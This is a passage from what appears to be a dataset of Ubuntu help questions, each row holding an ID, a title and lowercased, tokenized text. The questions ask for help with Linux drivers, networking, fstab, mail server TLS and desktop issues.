: 00 : a5 : a6:57:59 : de:47:4b : c5 : c4:31:20:88:0c:1b:94 : a5:39 : f4:31 sig_hashalgo : sha512 parm : nmea : nmea streaming ( bool ) and modinfo sierra_net shows : filename : /lib/modules/3.13.0-24-generic/kernel/drivers/net/usb/sierra_net.ko license : gpl version : v.2.0 description : usb-to-wwan driver for sierra wireless modems author : paxton smith , matthew safar , rory filer srcversion : 896313daa9c61c842f37412 alias : usb : v0f3dp68aad*dc*dsc*dp*ic*isc*ip*in0b* alias : usb : v0f3dp68aad*dc*dsc*dp*ic*isc*ip*in0a* alias : usb : v0f3dp68aad*dc*dsc*dp*ic*isc*ip*in07* alias : usb : v1199p68aad*dc*dsc*dp*ic*isc*ip*in0b* alias : usb : v1199p68aad*dc*dsc*dp*ic*isc*ip*in0a* alias : usb : v1199p68aad*dc*dsc*dp*ic*isc*ip*in07* alias : usb : v0f3dp68a3d*dc*dsc*dp*ic*isc*ip*in0b* alias : usb : v0f3dp68a3d*dc*dsc*dp*ic*isc*ip*in0a* alias : usb : v0f3dp68a3d*dc*dsc*dp*ic*isc*ip*in07* alias : usb : v1199p68a3d*dc*dsc*dp*ic*isc*ip*in0b* alias : usb : v1199p68a3d*dc*dsc*dp*ic*isc*ip*in0a* alias : usb : v1199p68a3d*dc*dsc*dp*ic*isc*ip*in07* depends : usbnet intree : y vermagic : 3.13.0-24-generic smp mod_unload modversions signer : magrathea : glacier signing key sig_key : 00 : a5 : a6:57:59 : de:47:4b : c5 : c4:31:20:88:0c:1b:94 : a5:39 : f4:31 sig_hashalgo : sha512 finally , ifconfig -a shows the eth1 , lo and p5p1 interfaces ( the motherboard has two nics ) . i ( obviously ) need the card to present itself as a network interface in order for our applications to work . i also noticed that there are no ttyusb* devices in /dev and i 'm not sure why this is the case . i am relatively new to linux ( but not at all to oss ) and do n't really know where to go from here . what i do know is that this model does n't support direct-ip as some other models do . i have also searched the sw support site , but most of the docs relate to writing drivers to interface to their device . some of the specs mention the gobi project , but it 's been really hard to make head-or-tail of what direction to go with so little info available and the lack of knowledge on my part .
484291	how to use uuids in fstab for configuring btrfs raid1	this is similar to this question , but the solution there was to choose the disks using `` device=/dev/sda1 , /dev/sdb1 '' , which is not as robust as using uuids . i 'm sure it can be done , but i ca n't find any examples/documentation using uuids for the individual disks . the closest example i could find is here , but that 's using `` by-id '' device=/dev/disk/by-id/ata-hgst_hds724040ale640_pk1334pbg3gyhs instead of uuid which i 'd prefer . using that as a template , i tried uuid=3d12bc7b-61b1-4dea-b78b-ef9a44a6b698 /media/btr0 btrfs device=/dev/disk/by-uuid/6dc5624c-2d54-4726-b2fa-a7a988d337a4 , device=/dev/disk/by-uuid/b57f2240-fa2e-4516-9049-603d2c5029b5 0 0 but it did n't work . any ideas ?
484293	openstack neutron - can not access tenant router gateway	using cs : trusty/quantum-gateway-2 , cs : trusty/nova-cloud-controller-40 and cs : trusty/nova-compute-2 , while following neutron setup as delineated in http : //docs.openstack.org/trunk/install-guide/install/apt/content/neutron_initial-external-network.html/ http : //docs.openstack.org/trunk/install-guide/install/apt/content/neutron_initial-tenant-network.html can not ping router 's gateway . actually , am able to ping it , only from neutron node with namespace , i.e. , ip netns exec qrouter-cddd34de-469e-4a69-90cf-07b3af242777 returns the pings . however , can not do so from other nodes , with or without namespace . also looking at horizon 's network page , status of external gateway is down . private network was designated as 192.168.1.0 and public network is shared with maas.also noted that if `` ext-port '' , in neutron charm , is set to maas 's physical interface , all connections to the node is lost . any thought or help is appreciated .
484300	how to get audio jack to work ?	so i have been hovering around the internet for the last couple of hours trying to figure out how to get my audio from my jack working . i have an alienware mx14 r3 with a sound blaster card . what is wierd is the speakers on my laptop will work but the jack will not . the reason why i am asking this question is because i have found conflicting solutions pretty much all around the web all of them not working . of course i am running ubuntu 14.04 . i would love to head a clear and concise answer that is mildly understandable . i have run through alot of alsa commands on other website none of them working i made a couple changes to one alsa file to try to make it work but nothing happened ( very anticlimactic ) . on a side note i am a little bit of a linux noob but i already love it i am duel booting a windows 7 laptop which runs the jack fine in windows .
484301	win 8.1 wo n't boot	i have read alot about dual booting ubuntu and windows , but i have not seen an answer to my situation . i have an hp g17 laptop . i removed the hd and put in a 240 gb ssd and installed win 8.1 . works beautifully . i removed the cd/dvd and installed a hd caddy with a 120gb ssd . it has ubuntu 10.04lts , ubuntu 14.04lts and mint 16 in 3 partitions . i can get to all for operating systems with both drives in place . grub 2 menu on the 240 will load mint 16 , 14.04 and win 8.1 . grub 1.98 menu on the 120 will load 10.04 , mint 16 , 14.04 and 8.1 . my problem comes in when i remove the 120 and put in the cd/dvd drive , all i get is grub rescue and can not access win 8.1 or cd/dvd . i want 8.1 with no grub menu so when i change boot order to 240 it will boot into 8.1 . then when i change boot order to 120 the grub menu gives me the 3 ubuntu options . when i boot 8.1 the error i get is : no such device : a5f413dd-a6d0-4d0b-8809-657120d674cd . when i run bcdedit , it gives a different id which must be for win 8.1 . any ideas ? thanks in advance , gencom
484305	change color scheme in kate	i 'm looking to change the color scheme in kate to something else ( e.g solarized , zenburn , etc ) . i tried the instructions found in using âoblivionâ color scheme from gedit in kate , but nothing changed when i closed and reopened kate . what should i do differently ?
484308	create floppy images	i 'm running a virtualbox ms dos 6.22 emulator and i need quite a lot of virtual floppy images filled with software . does anyone know a good program to efficiently create floppy images and fill them with my specified files ? ? it 's for an old school gaming night and we want it to be as authentic as possible . both software as ways to mount several floppys at once ( or to mount , unmount and to mount the next floppy in quick succession ) using the terminal are appreciated .
484310	how do i restore the password from another installation ?	i have arch installed along with ubuntu . i forgot the password for arch . luckily , i can read its /etc/passwd file . but i ca n't understand what the password really is and if it is there anyway or not . how or where do i find it ? p.s . i am aware about being able to boot through live cd , but that 's the harder path and there is no need in it since i am able to see the arch 's /etc/passwd file .
484313	ca n't install kernel in virtualbox	i tried to compile kernel and install it so that i can learn how to make linux kernel module . hi can do this on a normal ubuntu pc . however , i tried to compile and install kernel inside virtualbox and it did n't work . the compilation was success i guess , but when i install it with sudo dpkg -i install linux-headers-3.14.5 i got the error message like this : error ! your kernel headers for kernel 3.14.5 can not be found . please install the kernel 3.14.5 package or use the -- kernelsourcedir option to tell dkms where it 's located i 've installed the virtualbox-dkms but still this installation does n't work . so , any solution ?
484316	how to increase resolution on ubuntu 14.04 for t60	yes i have a ibm t60 and its stuck at 1024x768 4:3 . i would like to increase it to a higher level and theirs no additional drivers available . i am not sure whats the drivers i do n't know where to find it at and i cant find the solution on-line any where most other people have it set to a higher resolution and most of the other people say theirs is a rad-eon driver .
484320	i forgot computer user password	i ca n't log-in on my computer , i forgot user password . how do i change password and get back on computer ?
484321	network is unreachable - ubuntu 14.04	i ca n't ping to 8.8.8.8 , it reply 'network is unreachable ' . this is my setup for /etc/network/interaces : the loopback network interface auto lo iface lo inet loopback # the primary network interface auto eth0 # iface eth0 inet dhcp iface eth0 inet static address 192.168.0.123 network 192.168.0.0 netmask 255.255.255.0 broadcast 192.168.0.255 gateaway 192.168.0.1 dns-nameservers 192.168.0.11 already restart the service . restart the server . but still the same result . please help me . i on9 24/7 . will reply asap .
484328	how do i stop ubuntu one from telling me its file service will be shutting down two weeks ago ?	i have ubuntu 12.04 lts . starting a few weeks ago , every time i boot a message would pop up in the notification area and say that ubuntu one 's file services will be shutting down june 1st , 2014 . this makes no sense because : i 've never used ubuntu one 's file services . in fact , i uninstalled ubuntu one over a year ago . it 's good that the service will be shutting down on june 1st , but it 's june 16th now . these messages did n't start until after june 1st anyways . how do i make this message stop ?
484330	about themes of ubuntu	before installing a theme , i would like to know what does a theme actually change ? i can still change my wallpaper right ? but the screenshots i see of themes seem different in that . for example , one theme had a light-blue wallpaper and so all its windows and dialogues were light-blue . does it mean the theme is set to light-blue and has an uneditable wallpapers package ? further , by unity tweak tool and other tools , i can change the colour schemes , etc . so what 's the use of a theme anyway ?
484331	hp pavilion g6 with intel wireless 1030 , driver is loaded but hard blocked , and no wifi	this notebook wireless is n't working . i have loaded the correct driver , but i get a message that the device is hard blocked . if i press fn + f12 it will only enable/disable soft block . below id information about my wireless hardware . sudo rfkill list 0 : phy0 : wireless lan soft blocked : no hard blocked : yes i try with unblock all , and it wo n't work . ifconfig -a eth0 link encap : ethernet hwaddr 38 : ea : a7 : e3:89:8a inet addr:192.168.0.102 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :3aea : a7ff : fee3:898a/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:14187 errors:0 dropped:0 overruns:0 frame:0 tx packets:12719 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:14686468 ( 14.6 mb ) tx bytes:1865742 ( 1.8 mb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:698 errors:0 dropped:0 overruns:0 frame:0 tx packets:698 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:77919 ( 77.9 kb ) tx bytes:77919 ( 77.9 kb ) wlan0 link encap : ethernet hwaddr bc:77:37 : e6:6b:80 broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) sudo ifconfig wlan0 up siocsifflags : operation not possible due to rf-kill any solution ?
484332	remapping keyboard volume controls	i want to use this keyboard with ubuntu ( 12.04 ) : http : //www.amazon.com/filco-majestouch-2-tenkeyless-fkbn87ml-efb2/dp/b0050odqei it has no media keys . what i 'm wondering is , will i be able to remap the 'print screen ' , 'scroll lock ' and 'pause break ' keys to the volume controls ( 'mute ' , 'down ' , 'up ' ) , without activating their original functions , or anything else ( i.e . screenshot , etc ) ? or , do you have a better solution for what keys i can remap the volume controls to ? thank you .
484334	starting sphinxsearch	i 've successfully installed sphinxsearch following the documentation here : http : //sphinxsearch.com/docs/current.html when i try running the command sudo service sphinxsearch start it returns the following : sphinxsearch stop/pre-start , process 4392 i 'm unable to then find this pid and if i immediately run the same command with stop i get stop : unknown instance : i am able to manually start it by running searchd however , my test script to search is not returning results like it does in my dev environment . unsure if this is related or not yet ...
484336	gear icon missing ubuntu 14.04 from login	ok im done looking ... . i 'm missing the little gear icon on the login menu/window . i 'm trying to load up lubuntu . is their a terminal command to do this ? or is their a terminal command for the little gear icon . i all ready did this part `` sudo apt-get install lubuntu-desktop '' .
484338	how do i create a bootable usb on a mac on a hard drive that is partitioned ?	i 'm a noob , so can someone walk me through a set of steps to run ubuntu on my mac off of a 50 gig partition on my external hard disk ?
484341	self-signed server certificate for postfix tls	i 'm trying to create the self-signed server certificate for the postfix user : thufir @ dur : ~ $ thufir @ dur : ~ $ sudo ./tls.script error opening private key 3073578684 : error:02001002 : system library : fopen : no such file or directory : bss_file.c:398 : fopen ( '' , 'r ' ) 3073578684 : error:20074002 : bio routines : file_ctrl : system lib : bss_file.c:400 : unable to load private key thufir @ dur : ~ $ thufir @ dur : ~ $ nl tls.script 1 # dir= '' $ ( postconf -h config_directory ) '' 2 # fqdn= $ ( postconf -h myhostname ) 3 # case $ fqdn in /* ) fqdn= $ ( cat `` $ fqdn '' ) ; ; esac 4 # ymd= $ ( date + % y- % m- % d ) 5 # key= '' $ { dir } /key- $ { ymd } .pem '' ; rm -f `` $ { key } '' 6 # cert= '' $ { dir } /cert- $ { ymd } .pem '' ; rm -f `` $ { cert } '' 7 # ( umask 077 ; openssl genrsa -out `` $ { key } '' 2048 ) & & 8 openssl req -new -key `` $ { key } '' \ 9 -x509 -subj `` /cn= $ { fqdn } '' -days 3650 -out `` $ { cert } '' & & 10 postconf -e \ 11 `` smtpd_tls_cert_file = $ { cert } '' \ 12 `` smtpd_tls_key_file = $ { key } '' thufir @ dur : ~ $ as per the postfix quick-start on tls . thufir @ dur : ~ $ postconf -n alias_database = hash : /etc/aliases alias_maps = hash : /etc/aliases , hash : /var/lib/mailman/data/aliases append_dot_mydomain = no biff = no broken_sasl_auth_clients = yes config_directory = /etc/postfix default_transport = error home_mailbox = maildir/ inet_interfaces = all mailbox_command = mailbox_size_limit = 0 mailman_destination_recipient_limit = 1 mydestination = dur.bounceme.net , localhost.bounceme.net , localhost myhostname = dur.bounceme.net mynetworks = 127.0.0.0/8 [ : :ffff:127.0.0.0 ] /104 [ : :1 ] /128 myorigin = /etc/mailname readme_directory = no recipient_delimiter = + relay_domains = lists.dur.bounceme.net relay_transport = error relayhost = smtp_tls_note_starttls_offer = yes smtp_tls_security_level = may smtp_tls_session_cache_database = btree : $ { data_directory } /smtp_scache smtp_use_tls = yes smtpd_banner = $ myhostname esmtp $ mail_name ( ubuntu ) smtpd_recipient_restrictions = permit_sasl_authenticated , permit_mynetworks , reject_unauth_destination smtpd_relay_restrictions = permit_mynetworks permit_sasl_authenticated defer_unauth_destination smtpd_sasl_auth_enable = yes smtpd_sasl_authenticated_header = yes smtpd_sasl_local_domain = smtpd_sasl_path = private/dovecot-auth smtpd_sasl_security_options = noanonymous smtpd_sasl_type = dovecot smtpd_sender_restrictions = reject_unknown_sender_domain smtpd_tls_cafile = /etc/ssl/certs/cacert.pem smtpd_tls_auth_only = no smtpd_tls_cert_file = /etc/ssl/certs/smtpd.crt smtpd_tls_key_file = /etc/ssl/private/smtpd.key smtpd_tls_loglevel = 2 smtpd_tls_mandatory_ciphers = medium smtpd_tls_mandatory_protocols = sslv3 , tlsv1 smtpd_tls_received_header = yes smtpd_tls_security_level = may smtpd_tls_session_cache_database = btree : $ { data_directory } /smtpd_scache smtpd_tls_session_cache_timeout = 3600s smtpd_use_tls = yes tls_random_source = dev : /dev/urandom transport_maps = hash : /etc/postfix/transport thufir @ dur : ~ $ do i need to run the script from a certain location ? i was just running it from my home directory , with sudo . incidentally , i would be ok with using the snake oil certificate .
484342	usb disk not showing in host os ( windows7 ) after changing partition table in virtualmachine ( ubuntu 12.04 )	this is what happened - i changed the partition type of my sandisk 16 gb pendrive from 'w95 fat32 ' to 'linux ' ( i.e writing the new partition table ) using fdisk command - i then changed it back again to its previous type using the same command - i viewed it 's partition table using the same fdisk command ( using option p ) , and it was showing the right thing . - i thought my usbdrive 's type has returned to normal . - but after closing the virtualbox the usbdrive was not shown in win7 . so can anyone please tell me if the problem is with my guest os or host os , what it is and how can i solve it ? ? thanks in advance
484345	12.04 lts : fstab mount fails , but udisks mount works	i set up a dual boot setup on my netbook to try ubuntu . since i liked it , i carved out an additional partition to use with ubuntu . i am able to successfully mount this partion by adding this command to startup applications /usr/bin/udisks -- mount /dev/disk/by-uuid/c1e4fe5a-df6b-4910-811d-a6f5d76d59c2 however , in the interest of learning , i tried to mount this partition through fstab instead , since it seemed that this was the more normal way . here are all the lines from fstab that are not comments . i added the last line . uuid=4c24d79e-fd82-45a7-91fc-787aff8ec4e1 / ext4 errors=remount-ro 0 1 uuid=9e15e92b-411d-443e-a3d4-584748010ba5 none swap sw 0 0 uuid=c1e4fe5a-df6b-4910-811d-a6f5d76d59c2 /media/mountpoint auto auto , users , uid=1000 , gid=100 , dmask=027 , fmask=137 0 2 before saving the fstab , i disabled my startup application command , rebooted , and confirmed that the new partition was not mounted . i then saved fstab and did the sudo mount -a but i got this error mount : wrong fs type , bad option , bad superblock on /dev/sda3 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so i 'd appreciate any advice on what i did wrong with my fstab update .
484347	how to improve fonts displayed in evince ?	note this is probably a duplicate , in fact i 'm sure it must be a duplicate , but i ca n't find it anywhere . there are questions about font rendering or incorrect fonts in evince , but as far as i can tell , not the specific case i am referring to here . it seems that evince does not handle display fonts well . if i open a pdf in acroread ( or whatever the pdf reader from adobe is called nowadays ) , it looks fine , but when i open the same pdf in evince , the results look horrible . here is a comparison : ( evince is the lower sample ) does anyone know how to force evince to display the fonts correctly or , as an alternative , suggest a better alternative to evince ? overall i like evince because it is fast and secure ( it does n't execute embedded javascript which appears to be the most commonly spread vulnerabilities from the interwebs lately ) , but i 'm happy to consider alternatives .
484349	login screen problems	i downloaded ubuntu onto my hp computer tonight and i am unable to login . when i restart my computer , it shows me a black screen and asks for my login name and password which i provide . it then says something like kelly @ kellybrown and wants me to type something , but no matter what i type it does n't let me go past the screen . what can i do or how do i get past this screen . did i do something wrong during the download ?
484352	i ca n't get .sh files to open as programs . help plz	so i did the usual right click - > properties - > permissions and finally checking the `` allow executing file as program '' box . this worked always with ubuntu 12.04 . last night i upgraded to 14.04 and this no longer works . all i get now is a text file with a bunch of codes . can someone plz tell me how i can get .sh files to exectute as programs . i 'm totally stuck here . thanks in advance .
484354	synaptics touchpad scroll not working	i am running ubuntu 14.04 on my dell studio 1557 . my synaptics touch pad is detected but the scroll functions are not working . the scroll option in the gui for the mouse and touch pad has disappeared . i have tried reinstalling xserver-xorg-input-synaptics package but receive the following error of package 'xorg-input-abi-20 ' has no installation candidate . please advise for a solution . the following is the output and i am still unable to install the multi-touch package . hmehra @ ubuntu : ~ $ sudo apt-get install -f [ sudo ] password for hmehra : reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . removed xserver-xorg-core hmehra @ ubuntu : ~ $ sudo apt-get autoremove xserver-xorg-core [ sudo ] password for hmehra : reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : xserver-xorg xserver-xorg-core xserver-xorg-input-evdev xserver-xorg-input-mouse xserver-xorg-input-vmmouse xserver-xorg-input-wacom xserver-xorg-video-ati xserver-xorg-video-cirrus xserver-xorg-video-fbdev xserver-xorg-video-intel xserver-xorg-video-mach64 xserver-xorg-video-mga xserver-xorg-video-modesetting xserver-xorg-video-neomagic xserver-xorg-video-nouveau xserver-xorg-video-openchrome xserver-xorg-video-qxl xserver-xorg-video-r128 xserver-xorg-video-radeon xserver-xorg-video-s3 xserver-xorg-video-savage xserver-xorg-video-siliconmotion xserver-xorg-video-sis xserver-xorg-video-sisusb xserver-xorg-video-tdfx xserver-xorg-video-trident xserver-xorg-video-vesa xserver-xorg-video-vmware 0 upgraded , 0 newly installed , 28 to remove and 60 not upgraded . after this operation , 11.7 mb disk space will be freed . do you want to continue ? [ y/n ] y ( reading database ... 411157 files and directories currently installed . ) removing xserver-xorg ( 1:7.7+1ubuntu8 ) ... removing xserver-xorg-video-siliconmotion ( 2:1.7.7-makson1~raring1 ) ... removing xserver-xorg-video-ati ( 2:7.1.0-makson1~raring2 ) ... removing xserver-xorg-input-vmmouse ( 2:13.0.0-makson1~raring2 ) ... removing xserver-xorg-input-mouse ( 2:1.8.1-makson1~raring3 ) ... removing xserver-xorg-video-mach64 ( 1:6.9.4-makson1~raring2 ) ... removing xserver-xorg-video-intel ( 3:2.21.4-makson1~raring1 ) ... removing xserver-xorg-input-evdev ( 2:2.7.3-makson1~raring1 ) ... removing xserver-xorg-input-wacom ( 2:0.20.0-makson1~raring2 ) ... removing xserver-xorg-video-cirrus ( 2:1.5.2-makson1~raring1 ) ... removing xserver-xorg-video-fbdev ( 2:0.4.3-makson1~raring1 ) ... removing xserver-xorg-video-mga ( 2:1.6.2-makson1~raring1 ) ... removing xserver-xorg-video-modesetting ( 1:0.6.0-makson1~raring1 ) ... removing xserver-xorg-video-neomagic ( 2:1.2.7-makson1~raring1 ) ... removing xserver-xorg-video-nouveau ( 2:1.0.6-makson1~raring1 ) ... removing xserver-xorg-video-openchrome ( 2:0.3.1-makson1~raring1 ) ... removing xserver-xorg-video-qxl ( 1:0.1.0-makson1~raring1 ) ... removing xserver-xorg-video-r128 ( 1:6.9.1-makson1~raring1 ) ... removing xserver-xorg-video-radeon ( 2:7.1.0-makson1~raring2 ) ... removing xserver-xorg-video-s3 ( 2:0.6.5-makson1~raring1 ) ... removing xserver-xorg-video-savage ( 2:2.3.6-makson1~raring1 ) ... removing xserver-xorg-video-sis ( 2:0.10.7-makson1~raring2 ) ... removing xserver-xorg-video-sisusb ( 2:0.9.6-makson1~raring1 ) ... removing xserver-xorg-video-tdfx ( 2:1.4.5-makson1~raring1 ) ... removing xserver-xorg-video-trident ( 2:1.3.6-makson1~raring1 ) ... removing xserver-xorg-video-vesa ( 2:2.3.2-makson1~raring1 ) ... removing xserver-xorg-video-vmware ( 2:13.0.0-makson1~raring1 ) ... removing xserver-xorg-core ( 3:1.12.4+git20121105-makson2~raring1 ) ... processing triggers for man-db ( 2.6.7.1-1 ) ... processing triggers for libc-bin ( 2.19-0ubuntu6 ) ... output on reinstalling - hmehra @ ubuntu : ~ $ sudo apt-get install xserver-xorg-core reading package lists ... done building dependency tree reading state information ... done the following package was automatically installed and is no longer required : libxatracker1 use 'apt-get autoremove ' to remove it . suggested packages : xfonts-100dpi xfonts-75dpi the following new packages will be installed : xserver-xorg-core 0 upgraded , 1 newly installed , 0 to remove and 60 not upgraded . need to get 1,228 kb of archives . after this operation , 3,757 kb of additional disk space will be used . get:1 http : //us.archive.ubuntu.com/ubuntu/ trusty/main xserver-xorg-core amd64 2:1.15.1-0ubuntu2 [ 1,228 kb ] fetched 1,228 kb in 1s ( 633 kb/s ) selecting previously unselected package xserver-xorg-core . ( reading database ... 410842 files and directories currently installed . ) preparing to unpack ... /xserver-xorg-core_2 % 3a1.15.1-0ubuntu2_amd64.deb ... unpacking xserver-xorg-core ( 2:1.15.1-0ubuntu2 ) ... processing triggers for man-db ( 2.6.7.1-1 ) ... setting up xserver-xorg-core ( 2:1.15.1-0ubuntu2 ) ...
484355	getting gui for ubuntu server 14.0	i want to install ubuntu server to connect hp thin clients and want to have gui interface for the server . i have hardware firewall ( cyberoam ) and unable to connect to the internet for installing packages .
484358	ca n't install ubuntu 14.04 with usb & md5 check sums are different	when i try to install ubuntu with usb stick just gets to where its about to start with the purple ubuntu loading screen then it goes back to text and gives this message busybox v1.21.1 ( ubuntu 1:1.21.0-1ubuntu1 ) built-in shell ( ash ) enter 'help ' for a list of built-in commands . ( initramfs ) mount : mounting /dev/loop0 on //filesystem.squashfs failed : invalid argument can not mount /dev/loop0 ( /cdrom/casper/filesystem.squashfs ) on //filesystem.squashfs when checked , it comes out that md5 check sums are different . please tell me what to do to solve this ? ? ? ? in detail.. thanks
484362	shell scripting works with bash but not with sh	# ! bin/bash name [ 0 ] = '' kanna '' echo `` first name : $ { name [ 0 ] } '' .the above script is executed with bash filename but not with sh filename
484365	transfering /home to a new partition	i have one physical hard disk . originally , it was partitioned into / and /swap . using gparted , i downsized / and created/added a new partition /dev/sda1 as an ext4 partition . i want to do the following : 1 . transfer all contents of the original /home to the new partition . 2 . establish the new partition as /home for all users ( now only 1 regular user plus root user ) . 3 . delete original /home directory . this will leave /home on its own partition . how do i do this ? thanking you all in advance , and special thanks to those who told me how to use gparted successfully . chaim frazer
484369	no terminal commands are working at all after install of lubuntu 14.04	i am at a loss . all that i get are error messages . and it is not random . all terminal commands are reporting errors . i was advised to re-download lubuntu and to be sure that the md5sum was correct . i did and it is correct . then i ran a check for errors on the cd , no errors found . then i booted to try lubuntu without installing . it went to desktop very fast . i started to write some terminal commands : sudo , apt-get , mkdir , wget , sh all give error like this one sudo : command not found it does n't matter if you combine these with other commands you will always get error messages . for example when i try to install something : sudo apt-get install ( any program ) : this will yield nothing but error messsages : '' no command sudo found , did you mean : command 'sudo ' from package 'sudo-ldap ' ( universe ) command 'sudo ' from package 'sudo ' ( main ) '' and so on ... i did n't write down the other error messages for apt-get ... the error list sometimes fills up half the terminal screen . so i tried the cd on another completely different computer . once again booted to the desktop very fast . when i started to input terminal commands , i see the same exact error messages . no changes . i am at a loss . i can not do anything . is the download itself corrupt even though the md5 is verified correct ? i downloaded directly from the lubuntu home page . md5sum : link : is there any way to fix this issue ? any help would be greatly appreciated . thank you .
484372	internet is not coming but skype is working	i am unable to connect to internet . all configuration are correct . whenever i start my system i need to do the following configuration . log in to root , cd /etc nano resolve.conf then i write the following things . ' name server 127.0.0.1 name server 8.8.8.8 name server 198.168.1.1 then internet is working i do n't know why this is happening may be dns problem . so how can i solve this issue.and why this is happening .
484373	ca n't install mac os x 10.8.5 in virtualbox in ubuntu 14.04	i downloaded the install os x mountain lion 10.8.5.dmg and tried to install it in virtualbox . when i loaded the image into the virtual dvd rom i got this error : failed to open the optical disk file /media/nuwan600/9224f2d024f2b5f7/os/install os x mountain lion 10.8.5.dmg . could not open the medium '/media/nuwan600/9224f2d024f2b5f7/os/install os x mountain lion 10.8.5.dmg ' . vd : error verr_vd_dmg_invalid_header opening image file '/media/nuwan600/9224f2d024f2b5f7/os/install os x mountain lion 10.8.5.dmg ' ( verr_vd_dmg_invalid_header ) . details ⠀result code : ns_error_failure ( 0x80004005 ) ⠀component : medium ⠀interface : imedium { 05f2bbb6-a3a6-4fb9-9b49-6d0dda7142ac } ⠀callee : ivirtualbox { fafa4e17-1ee2-4905-a10e-fe7c18bf5554 } ⠀callee rc : vbox_e_object_not_found ( 0x80bb0001 ) how can i fix this error ?
484375	ubuntu 12.04 ethernet network not connected	i connected to the internet ok up stairs ( wired ) . i then move the computer downstairs within minutes : i get `` no internet connection '' message . i connect via a switch , wired . i checked the ethernet connection with a laptop ( disabled the wireless and still had internet connection on the laptop ) . i tried googling for solution but did n't get too much out of it . i am not computer savvy and have zero experience with ubuntu . badly needing help . thank you .
484381	mysql ambiguous option issue	mysql is starting correctly as a service , and my wp instance / phpmyadmin connects to it successfully . however , i 've managed to screw something up such that when i try to log in from the prompt , mysql spits out an error about an ambiguous option issue , even when i provide no options . gregory @ myserver : ~ $ mysql mysql : ambiguous option ' -- v ' ( vertical , version ) i do not think i have an alias set , and i tried the following ( note the backslash ) : gregory @ server : ~ $ \mysql mysql : ambiguous option ' -- v ' ( vertical , version ) any ideas ? i would prefer solving this rather than trying to reinstall .
484385	is there other way to get your display env without using shell ?	i have a script that will get executed by incrond when it sees changes in a watch dir . there is only a few env vars that are available in the script , the rest get cleared by incrond . so this becomes a problem when you want to execute something that depends on x vars such as $ display . so i 'm wondering if it 's possible to get var $ display from inside the script without querying from user shell
484387	can aspire one d260 run ubuntu 14.04 lts ?	if so then i am going to install it formatting windows xp .
484389	ubuntu search does not find .htaccess	i have a folder which has sub folders where some of them contain .htaccess files . but if i use the search tool i do not find any of these files . also using in terminal : find ~/web '.htaccess' leaves me with nothing . what is the problem here ?
484397	how do i set ubuntu to recognize my hardware	i have a thumb drive and hard drive that ubuntu recognizes as being 1/16 of the capacity short when installed and then takes 1/8 of the space to index .
484399	i want to use aptik for clean install fm 13.04 to 14.04	... . but 13.04 is past end-of-life and aptik will not install . is my only option to do an update from 13.04 to 13.10 then install aptik so i can do a clean install to 14.04 all my settings and packages intact ?
484400	getting an error while installing wine on ubuntu 12.10	i am getting following error while installing wine ... can any body help ? the following packages have unmet dependencies : icedtea-7-plugin : depends : icedtea-netx ( = 1.3.2-1ubuntu0.12.10.3 ) but 1.3-1ubuntu1.1 is to be installed openjdk-7-jre-headless : breaks : icedtea-netx ( < 1.3.2-1ubuntu0.12.10.2 ) but 1.3-1ubuntu1.1 is to be installed e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages .
484407	why does ubuntu keep asking me for another super user 's password ?	i have two users : misha-local ( the first user i created when installing ubuntu ) misha ( a user authenticated against an ldap server ) i 'm logged in as misha . misha @ misha-antec : ~ $ whoami misha misha @ misha-antec : ~ $ groups lmd adm cdrom sudo dip plugdev lpadmin sambashare as you can see , misha is an admin user . however , when i do anything requiring superuser access in the gui ( like installing software ) , i get this : why is it asking me for the password for misha-local ? the current user also has administrative privileges . why does n't it ask for the current user 's password instead ? edit this is an ubuntu 14.04 desktop installation . some more relevant command-line output : misha @ misha-antec : ~ $ id misha uid=13009 ( misha ) gid=10000 ( lmd ) groups=10000 ( lmd ) misha @ misha-antec : ~ $ id misha-local uid=1000 ( misha-local ) gid=1000 ( misha-local ) groups=4 ( adm ) ,24 ( cdrom ) ,27 ( sudo ) ,30 ( dip ) ,46 ( plugdev ) ,108 ( lpadmin ) ,124 ( sambashare ) ,1000 ( misha-local ) misha @ misha-antec : ~ $ whoami misha misha @ misha-antec : ~ $ groups lmd adm cdrom sudo dip plugdev lpadmin sambashare misha @ misha-antec : ~ $ groups misha misha : lmd this is odd . groups is reporting that misha is part of sudo and adm , but id and groups misha reports the opposite . what 's going on ? edit 2 misha @ misha-antec : ~ $ id -run misha misha @ misha-antec : ~ $ id -un misha misha @ misha-antec : ~ $ ps -a | grep nscd 8622 ? 00:00:02 nscd
484408	gnome shell lock screen problem in ubuntu 14.04	there is no option for lock screen . whenever i switch on from suspend mode , it does n't show any lock screen .
484409	script terminate	# check if vpnc is already running , otherwise start it if ( ps -ef | grep -v grep | grep -v vpnc_ondemand | grep -v less | grep vpnc > /dev/null ) ; then echo `` shell script is already running then dont run this script and terminate the script '' . exit else echo `` run the other part of script `` i want that if this process is already running then whole script just get terminated itself , and if does n't run further part of script . or this code which i have already written will execute it what am i looking for
484410	lenovo t440p ubuntu 14.04 compatibility ?	have anyone had any luck with installing a clean copy of ubuntu 14.04 on a lenovo t440p ( i have nvidia 730m on it , fyi ) ? my screen would n't even come past the language chooser a month ago , so i was wondering if anyone had any luck with it now ? i tried upgrading 13.10 to 14.04 which worked fine ... if ! i switched from kernel 3.13 to 3.11 , but that kinda defeats the purpose . thanks !
484412	ubuntu 10.04 wireless is not working in toshiba satellite pro c850-15q	ubuntu 10.04 wireless is not working in toshiba satellite pro c850-15q laptop but ubuntu 14.04 takes the wireless driver automaticaly , how to solve wireless problem in ubuntu 10.04
